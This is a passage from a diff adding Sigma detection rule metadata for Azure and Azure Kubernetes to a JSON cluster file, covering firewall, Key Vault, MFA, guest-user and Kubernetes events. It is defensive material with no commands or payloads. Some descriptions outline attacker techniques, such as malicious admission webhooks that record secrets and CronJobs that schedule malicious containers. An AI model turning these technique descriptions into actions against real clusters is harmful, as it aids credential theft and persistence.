whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_device_or_configuration_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#core-directory", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_device_or_configuration_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "46530378-f9db-4af9-a9e5-889c177d3881", + "value": "Azure Device or Configuration Modified or Deleted" + }, + { + "description": "Identifies when DNS zone is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_dns_zone_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "af6925b0-8826-47f1-9324-337507a0babd", + "value": "Azure DNS Zone Modified or Deleted" + }, + { + "description": "Identifies when an user or application modified the federation settings on the domain.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/06", + "falsepositive": [ + "Federation Settings being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Federation Settings modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_federation_modified.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/techniques/T1078", + "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_federation_modified.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "352a54e1-74ba-4929-9d47-8193d67aba1e", + "value": "Azure Domain Federation Settings Modified" + }, + { + "description": "Identifies when a firewall is created, modified, or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_firewall_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "512cf937-ea9b-4332-939c-4c2c94baadcd", + "value": "Azure Firewall Modified or Deleted" + }, + { + "description": "Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_firewall_rule_collection_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_firewall_rule_collection_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "025c9fe7-db72-49f9-af0d-31341dd7dd57", + "value": "Azure Firewall Rule Collection Modified or Deleted" + }, + { + "description": "Identifies IPs from which users grant access to other users on azure resources and alerts when a previously unseen source IP address is used.", + "meta": { + "author": "sawwinnnaung", + "creation_date": "2020/05/07", + "falsepositive": [ + "Valid change" + ], + "filename": "azure_granting_permission_detection.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/e534407884b1ec5371efc9f76ead282176c9e8bb/Detections/AzureActivity/Granting_Permissions_To_Account_detection.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_granting_permission_detection.yml" + ], + "tags": [ + "attack.t1098" + ] + }, + "uuid": "a622fcd2-4b5a-436a-b8a2-a4171161833c", + "value": "Granting Of Permissions To An Account" + }, + { + "description": "Monitor and alert on group membership additions of groups that have CA policy modification access", + "meta": { + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "creation_date": "2022/08/04", + "falsepositive": [ + "User removed from the group is approved" + ], + "filename": "azure_group_user_addition_ca_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_addition_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "91c95675-1f27-46d0-bead-d1ae96b97cd3", + "value": "User Added To Group With CA Policy Modification Access" + }, + { + "description": "Monitor and alert on group membership removal of groups that have CA policy modification access", + "meta": { + "author": "Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'", + "creation_date": "2022/08/04", + "falsepositive": [ + "User removed from the group is approved" + ], + "filename": "azure_group_user_removal_ca_modification.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_group_user_removal_ca_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "665e2d43-70dc-4ccc-9d27-026c9dd7ed9c", + "value": "User Removed From Group With CA Policy Modification Access" + }, + { + "description": "Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/08/10", + "falsepositive": [ + "A non malicious user is unaware of the proper process" + ], + "filename": "azure_guest_invite_failure.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_invite_failure.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "0b4b72e3-4c53-4d5b-b198-2c58cfef39a9", + "value": "Guest User Invited By Non Approved Inviters" + }, + { + "description": "Detects the change of user type from \"Guest\" to \"Member\" for potential elevation of privilege.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/06/30", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_guest_to_member.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_guest_to_member.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "8dee7a0d-43fd-4b3c-8cd1-605e189d195e", + "value": "User State Changed From Guest To Member" + }, + { + "description": "Identifies when a Keyvault Key is modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Key being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_keyvault_key_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_key_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "80eeab92-0979-4152-942d-96749e11df40", + "value": "Azure Keyvault Key Modified or Deleted" + }, + { + "description": "Identifies when a key vault is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Key Vault being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_keyvault_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "459a2970-bb84-4e6a-a32e-ff0fbd99448d", + "value": "Azure Key Vault Modified or Deleted" + }, + { + "description": "Identifies when secrets are modified or deleted in Azure.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_keyvault_secrets_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_keyvault_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access", + "attack.t1552", + "attack.t1552.001" + ] + }, + "uuid": "b831353c-1971-477b-abb6-2828edc3bca1", + "value": "Azure Keyvault Secrets Modified or Deleted" + }, + { + "description": "Identifies when an admission controller is executed in Azure Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod.\nAn adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Azure Kubernetes Admissions Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_admission_controller.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ] + }, + "uuid": "a61a3c56-4ce2-4351-a079-88ae4cbd2b58", + "value": "Azure Kubernetes Admission Controller" + }, + { + "description": "Detects when a Azure Kubernetes Cluster is created or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_cluster_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "9541f321-7cba-4b43-80fc-fbd1fb922808", + "value": "Azure Kubernetes Cluster Created or Deleted" + }, + { + "description": "Identifies when a Azure Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/22", + "falsepositive": [ + "Azure Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_cronjob.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ] + }, + "uuid": "1c71e254-6655-42c1-b2d6-5e4718d7fc0a", + "value": "Azure Kubernetes CronJob" + }, + { + "description": "Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_events_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.t1562.001" + ] + }, + "uuid": "225d8b09-e714-479c-a0e4-55e6f29adf35", + "value": "Azure Kubernetes Events Deleted" + }, + { + "description": "Identifies when a Azure Kubernetes network policy is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_network_policy_change.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ] + }, + "uuid": "08d6ac24-c927-4469-b3b7-2e422d6e3c43", + "value": "Azure Kubernetes Network Policy Change" + }, + { + "description": "Identifies the deletion of Azure Kubernetes Pods.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_pods_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "b02f9591-12c3-4965-986a-88028629b2e1", + "value": "Azure Kubernetes Pods Deleted" + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding/ClusterRoleBinding.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_rolebinding_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.credential_access" + ] + }, + "uuid": "25cb259b-bbdc-4b87-98b7-90d7c72f8743", + "value": "Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted" + }, + { + "description": "Identifies when ClusterRoles/Roles are being modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_role_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "818fee0c-e0ec-4e45-824e-83e4817b0887", + "value": "Azure Kubernetes Sensitive Role Access" + }, + { + "description": "Identifies when a Kubernetes account access a sensitive objects such as configmaps or secrets.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_secret_or_config_object_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7ee0b4aa-d8d4-4088-b661-20efdf41a04c", + "value": "Azure Kubernetes Secret or Config Object Access" + }, + { + "description": "Identifies when a service account is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/07", + "falsepositive": [ + "Service account being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service account modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_kubernetes_service_account_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes", + "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/", + "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/", + "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1", + "https://attack.mitre.org/matrices/enterprise/cloud/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2", + "value": "Azure Kubernetes Service Account Modified or Deleted" + }, + { + "description": "Alert on when legecy authentication has been used on an account", + "meta": { + "author": "Yochana Henderson, '@Yochana-H'", + "creation_date": "2022/06/17", + "falsepositive": [ + "User has been put in acception group so they can use legacy authentication" + ], + "filename": "azure_legacy_authentication_protocols.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_legacy_authentication_protocols.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1212" + ] + }, + "uuid": "60f6535a-760f-42a9-be3f-c9a0a025906e", + "value": "Use of Legacy Authentication Protocols" + }, + { + "description": "Detect failed attempts to sign in to disabled accounts.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_login_to_disabled_account.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_login_to_disabled_account.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "908655e0-25cf-4ae1-b775-1c8ce9cf43d8", + "value": "Login to Disabled Account" + }, + { + "description": "User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.", + "meta": { + "author": "AlertIQ", + "creation_date": "2022/03/24", + "falsepositive": [ + "Users actually login but miss-click into the Deny button when MFA prompt." + ], + "filename": "azure_mfa_denies.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_denies.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ] + }, + "uuid": "e40f4962-b02b-4192-9bfe-245f7ece1f99", + "value": "Multifactor Authentication Denied" + }, + { + "description": "Detection for when multi factor authentication has been disabled, which might indicate a malicious activity to bypass authentication mechanisms.", + "meta": { + "author": "@ionsor", + "creation_date": "2022/02/08", + "falsepositive": [ + "Authorized modification by administrators" + ], + "filename": "azure_mfa_disabled.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://attack.mitre.org/techniques/T1556/", + "https://docs.microsoft.com/en-us/azure/active-directory/authentication/howto-mfa-userstates", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_disabled.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1556" + ] + }, + "uuid": "7ea78478-a4f9-42a6-9dcd-f861816122bf", + "value": "Disabled MFA to Bypass Authentication Mechanisms" + }, + { + "description": "Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_mfa_interrupted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_mfa_interrupted.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078.004" + ] + }, + "uuid": "5496ff55-42ec-4369-81cb-00f417029e25", + "value": "Multifactor Authentication Interrupted" + }, + { + "description": "Identifies when a Firewall Policy is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/02", + "falsepositive": [ + "Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_network_firewall_policy_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_policy_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "83c17918-746e-4bd9-920b-8e098bf88c23", + "value": "Azure Network Firewall Policy Modified or Deleted" + }, + { + "description": "Identifies when a Firewall Rule Configuration is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_network_firewall_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "2a7d64cf-81fa-4daf-ab1b-ab80b789c067", + "value": "Azure Firewall Rule Configuration Modified or Deleted" + }, + { + "description": "Identifies when a Point-to-site VPN is Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Point-to-site VPN being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Point-to-site VPN modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_network_p2s_vpn_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_network_p2s_vpn_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "d9557b75-267b-4b43-922f-a775e2d1f792", + "value": "Azure Point-to-site VPN Modified or Deleted" + }, + { + "description": "Identifies when a network security configuration is modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/08", + "falsepositive": [ + "Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "azure_network_security_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + 